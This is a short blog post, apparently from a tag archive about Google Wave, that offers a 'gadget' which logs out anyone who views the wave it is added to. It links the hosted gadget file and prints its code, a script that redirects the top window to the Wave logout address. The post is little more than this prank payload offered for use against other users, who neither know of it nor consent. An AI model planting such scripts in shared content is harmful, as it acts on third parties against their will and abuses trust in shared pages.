Tag Archives: wave
Google Wave – Make your friends logout gadget
Adding this gadget to any wave will make people log out when they see it: http://beford.org/stuff/waveg.xml The code: <script type=”text/javascript”> top.location=”https://wave.google.com/wave/logout”; </script>